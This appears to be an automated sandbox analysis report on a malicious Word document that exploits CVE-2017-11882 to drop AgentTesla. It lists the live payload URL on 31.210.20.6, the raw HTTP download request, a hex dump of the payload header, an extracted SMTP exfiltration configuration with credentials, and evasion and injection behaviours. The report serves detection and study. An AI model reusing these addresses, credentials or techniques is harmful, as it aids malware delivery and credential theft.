Play interactive tour

Edit tour

Analysis Report IMG_05412_868_21.docx

Overview

General Information

Sample Name:	IMG_05412_868_21.docx
Analysis ID:	404303
MD5:	8832e0557e1b144bad206ed6d14d5c34
SHA1:	4b729d3262362a2ab3edab09ac1f625af8f5e0c1
SHA256:	fbd1b454da7fecb92c40b9b2f74fc8fecae79340afdc011e7c0d6339fabdcfde
Infos:
Most interesting Screenshot:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected AgentTesla

Allocates memory in foreign processes

Creates an undocumented autostart registry key

Drops PE files to the user root directory

Injects a PE file into a foreign processes

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Writes to foreign memory regions

Abnormal high CPU Usage

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Document contains no OLE stream with summary information

Document has an unknown application name

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Stores files to the Windows start menu directory

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Startup

System is w7x64

WINWORD.EXE (PID: 2464 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

EQNEDT32.EXE (PID: 2564 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

tthxx.exe (PID: 2928 cmdline: C:\Users\user\tthxx.exe MD5: CCE6C363C0FF7AC663CD71C5906069A6)

tthxx.exe (PID: 2312 cmdline: C:\Users\user\AppData\Local\Temp\tthxx.exe MD5: CCE6C363C0FF7AC663CD71C5906069A6)

EQNEDT32.EXE (PID: 3028 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

EQNEDT32.EXE (PID: 2452 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

tthxx.exe (PID: 2880 cmdline: C:\Users\user\tthxx.exe MD5: CCE6C363C0FF7AC663CD71C5906069A6)

EQNEDT32.EXE (PID: 2140 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

EQNEDT32.EXE (PID: 2196 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "bigazz@sixjan.xyzH^i?T2&gWQ({sixjan.xyz"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: tthxx.exe PID: 2312	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 31.210.20.6, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2564, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2564, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\44444[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Users\user\tthxx.exe, CommandLine: C:\Users\user\tthxx.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\tthxx.exe, NewProcessName: C:\Users\user\tthxx.exe, OriginalFileName: C:\Users\user\tthxx.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2564, ProcessCommandLine: C:\Users\user\tthxx.exe, ProcessId: 2928

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://31.210.20.6/3/44444.exe

Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 11.2.tthxx.exe.400000.1.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "bigazz@sixjan.xyzH^i?T2&gWQ({sixjan.xyz"}

Multi AV Scanner detection for domain / URL

Show sources

Source: http://31.210.20.6/3/44444.exe

Virustotal: Detection: 6%

Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\44444[1].exe	ReversingLabs: Detection: 40%
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	ReversingLabs: Detection: 40%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\notpad\notpad.exe	ReversingLabs: Detection: 40%
Source: C:\Users\user\tthxx.exe	ReversingLabs: Detection: 40%

Multi AV Scanner detection for submitted file

Show sources

Source: IMG_05412_868_21.docx	Virustotal: Detection: 30%			Perma Link
Source: IMG_05412_868_21.docx	ReversingLabs: Detection: 37%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\tthxx.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\tthxx.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\tthxx.exe	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\tthxx.exe	Jump to behavior

Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: C:\Users\user\tthxx.exe	Code function: 4x nop then jmp 001ED4D2h	4_2_001ED1D8
Source: C:\Users\user\tthxx.exe	Code function: 4x nop then jmp 001ED772h	4_2_001ED1D8
Source: C:\Users\user\tthxx.exe	Code function: 4x nop then jmp 001ED4D2h	4_2_001ED334
Source: C:\Users\user\tthxx.exe	Code function: 4x nop then jmp 001ED4D2h	4_2_001ED1D8
Source: C:\Users\user\tthxx.exe	Code function: 4x nop then jmp 001ED772h	4_2_001ED1D8

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 31.210.20.6:80

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 31.210.20.6:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2022566 ET TROJAN Possible Malicious Macro EXE DL AlphaNumL 192.168.2.22:49167 -> 31.210.20.6:80
Source: Traffic	Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49167 -> 31.210.20.6:80
Source: Traffic	Snort IDS: 2021245 ET TROJAN Possible Dridex Download URI Struct with no referer 192.168.2.22:49167 -> 31.210.20.6:80

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 04 May 2021 20:01:56 GMTServer: Apache/2.4.37 (centos) OpenSSL/1.1.1c mod_fcgid/2.3.9 PHP/7.2.24Last-Modified: Mon, 03 May 2021 22:54:49 GMTETag: "53d38-5c174d9438040"Accept-Ranges: bytesContent-Length: 343352Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 48 80 90 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 d2 04 00 00 4a 00 00 00 00 00 00 5e f0 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 f0 04 00 4b 00 00 00 00 00 05 00 2c 47 00 00 00 00 00 00 00 00 00 00 00 1e 05 00 38 1f 00 00 00 60 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 d0 04 00 00 20 00 00 00 d2 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2c 47 00 00 00 00 05 00 00 48 00 00 00 d4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 05 00 00 02 00 00 00 1c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 f0 04 00 00 00 00 00 48 00 00 00 02 00 05 00 e0 4a 00 00 24 2c 00 00 03 00 00 00 01 00 00 06 04 77 00 00 06 79 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 30 06 00 8c 00 00 00 00 00 00 00 1e 3a 05 00 00 00 dd 10 00 00 00 28 2f 00 00 06 38 f1 ff ff ff 26 dd 00 00 00 00 28 01 00 00 0a 14 fe 06 02 00 00 06 73 02 00 00 0a 6f 03 00 00 0a 20 b7 3e 6e 89 28 35 00 00 06 19 3a 36 00 00 00 26 20 81 3e 6e 89 28 35 00 00 06 17 8d 08 00 00 01 25 16 28 2d 00 00 06 a2 1a 3a 21 00 00 00 26 26 20 61 3e 6e 89 28 35 00 00 06 28 27 00 00 06 26 38 14 00 00 00 28 28 00 00 06 38 c1 ff ff ff 28 2a 00 00 06 38 d7 ff ff ff 2a 01 10 00 00 00 00 00 00 15 15 00 06 01 00 00 01 1b 30 04 00 dc 00 00 00 01 00 00 11 28 04 00 00 0a d0 02 00 00 02 28 05 00 00 0a 6f 06 00 00 0a 20 5e 3e 6e 89 28 35 00 00 06 28 07 00 00 0a 6f 08 00 00 0a 18 3a 06 00 00 00 26 38 06 00 00 00 0a 38 00 00 00 00 73 09 00 00 0a 1b 3a 1f 00 00 00 26 06 08 6f 0a 00 00 0a 08 6f 0b 00 00 0a 73 0c 00 00 0a 16 39 0c 00 00 00 26 38 0c 00 00 00 0c 38 dc ff ff ff 0d 38 00 00

Source: Joe Sandbox View

ASN Name: PLUSSERVER-ASN1DE PLUSSERVER-ASN1DE

Source: global traffic

HTTP traffic detected: GET /3/44444.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 31.210.20.6Connection: Keep-Alive

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4ABA8B27-B28F-4AE5-86AD-026C320EA73C}.tmp

Jump to behavior

Source: global traffic

Source: tthxx.exe, 0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: tthxx.exe, 0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: tthxx.exe, 0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp	String found in binary or memory: http://mNVnNH.com
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0H
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0I
Source: tthxx.exe, 00000004.00000002.2246288441.0000000005780000.00000002.00000001.sdmp, tthxx.exe, 00000008.00000002.2246287601.00000000057C0000.00000002.00000001.sdmp, tthxx.exe, 0000000B.00000002.2346087548.0000000005D30000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: tthxx.exe, 00000004.00000002.2246288441.0000000005780000.00000002.00000001.sdmp, tthxx.exe, 00000008.00000002.2246287601.00000000057C0000.00000002.00000001.sdmp, tthxx.exe, 0000000B.00000002.2346087548.0000000005D30000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: tthxx.exe, 0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: tthxx.exe	String found in binary or memory: https://discord.com/
Source: tthxx.exe, 00000004.00000000.2125555578.0000000000990000.00000002.00020000.sdmp, tthxx.exe, 00000008.00000002.2242647544.0000000000990000.00000002.00020000.sdmp, tthxx.exe, 0000000B.00000000.2239632507.0000000000180000.00000002.00020000.sdmp	String found in binary or memory: https://discord.com/2
Source: tthxx.exe, 00000004.00000000.2125555578.0000000000990000.00000002.00020000.sdmp, tthxx.exe, 00000004.00000002.2242103851.0000000000C63000.00000004.00000020.sdmp, tthxx.exe, 00000008.00000002.2242647544.0000000000990000.00000002.00020000.sdmp, tthxx.exe, 0000000B.00000000.2239632507.0000000000180000.00000002.00020000.sdmp	String found in binary or memory: https://discord.com/6
Source: tthxx.exe, 00000004.00000000.2125555578.0000000000990000.00000002.00020000.sdmp, tthxx.exe, 00000008.00000002.2242647544.0000000000990000.00000002.00020000.sdmp, tthxx.exe, 0000000B.00000000.2239632507.0000000000180000.00000002.00020000.sdmp	String found in binary or memory: https://discord.com/:
Source: tthxx.exe, 00000004.00000002.2246240028.0000000005390000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: tthxx.exe, 0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior

System Summary:

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\tthxx.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\44444[1].exe			Jump to dropped file

Source: C:\Users\user\tthxx.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\tthxx.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\tthxx.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\tthxx.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\tthxx.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Users\user\tthxx.exe	Code function: 4_2_001E7098	4_2_001E7098
Source: C:\Users\user\tthxx.exe	Code function: 4_2_001E8BEE	4_2_001E8BEE
Source: C:\Users\user\tthxx.exe	Code function: 4_2_001E0CA5	4_2_001E0CA5
Source: C:\Users\user\tthxx.exe	Code function: 4_2_001E1D78	4_2_001E1D78
Source: C:\Users\user\tthxx.exe	Code function: 4_2_001E55E0	4_2_001E55E0
Source: C:\Users\user\tthxx.exe	Code function: 4_2_001E5EB0	4_2_001E5EB0
Source: C:\Users\user\tthxx.exe	Code function: 4_2_001E07C8	4_2_001E07C8
Source: C:\Users\user\tthxx.exe	Code function: 4_2_001EA07C	4_2_001EA07C
Source: C:\Users\user\tthxx.exe	Code function: 4_2_001E2099	4_2_001E2099
Source: C:\Users\user\tthxx.exe	Code function: 4_2_001E5298	4_2_001E5298
Source: C:\Users\user\tthxx.exe	Code function: 4_2_001EA330	4_2_001EA330
Source: C:\Users\user\tthxx.exe	Code function: 4_2_001E6E30	4_2_001E6E30
Source: C:\Users\user\tthxx.exe	Code function: 4_2_001E1E2A	4_2_001E1E2A
Source: C:\Users\user\tthxx.exe	Code function: 4_2_001EBF00	4_2_001EBF00
Source: C:\Users\user\tthxx.exe	Code function: 4_2_001E9F90	4_2_001E9F90
Source: C:\Users\user\tthxx.exe	Code function: 4_2_005E0048	4_2_005E0048
Source: C:\Users\user\tthxx.exe	Code function: 4_2_005E0014	4_2_005E0014
Source: C:\Users\user\tthxx.exe	Code function: 8_2_002E7098	8_2_002E7098
Source: C:\Users\user\tthxx.exe	Code function: 8_2_002E8B80	8_2_002E8B80
Source: C:\Users\user\tthxx.exe	Code function: 8_2_002E0CA5	8_2_002E0CA5
Source: C:\Users\user\tthxx.exe	Code function: 8_2_002E1D78	8_2_002E1D78
Source: C:\Users\user\tthxx.exe	Code function: 8_2_002E55E0	8_2_002E55E0
Source: C:\Users\user\tthxx.exe	Code function: 8_2_002E5EB0	8_2_002E5EB0
Source: C:\Users\user\tthxx.exe	Code function: 8_2_002E07C8	8_2_002E07C8
Source: C:\Users\user\tthxx.exe	Code function: 8_2_002E900F	8_2_002E900F
Source: C:\Users\user\tthxx.exe	Code function: 8_2_002EA07C	8_2_002EA07C
Source: C:\Users\user\tthxx.exe	Code function: 8_2_002E2099	8_2_002E2099
Source: C:\Users\user\tthxx.exe	Code function: 8_2_002E5298	8_2_002E5298
Source: C:\Users\user\tthxx.exe	Code function: 8_2_002EA330	8_2_002EA330
Source: C:\Users\user\tthxx.exe	Code function: 8_2_002E8BCA	8_2_002E8BCA
Source: C:\Users\user\tthxx.exe	Code function: 8_2_002E1E2A	8_2_002E1E2A
Source: C:\Users\user\tthxx.exe	Code function: 8_2_002E6E30	8_2_002E6E30
Source: C:\Users\user\tthxx.exe	Code function: 8_2_002EBF00	8_2_002EBF00
Source: C:\Users\user\tthxx.exe	Code function: 8_2_002E9F90	8_2_002E9F90
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Code function: 11_2_00257578	11_2_00257578
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Code function: 11_2_00251F40	11_2_00251F40
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Code function: 11_2_00256CA8	11_2_00256CA8

Source: IMG_05412_868_21.docx

OLE indicator has summary info: false

Source: IMG_05412_868_21.docx

OLE indicator application name: unknown

Source: 44444[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: tthxx.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: notpad.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: tthxx.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOCX@12/11@0/1

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$G_05412_868_21.docx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRCF01.tmp

Jump to behavior

Source: IMG_05412_868_21.docx

OLE document summary: title field not present or empty

Source: C:\Users\user\tthxx.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\tthxx.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tthxx.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\tthxx.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\tthxx.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: IMG_05412_868_21.docx	Virustotal: Detection: 30%
Source: IMG_05412_868_21.docx	ReversingLabs: Detection: 37%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\tthxx.exe C:\Users\user\tthxx.exe
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\tthxx.exe C:\Users\user\tthxx.exe
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Users\user\tthxx.exe	Process created: C:\Users\user\AppData\Local\Temp\tthxx.exe C:\Users\user\AppData\Local\Temp\tthxx.exe
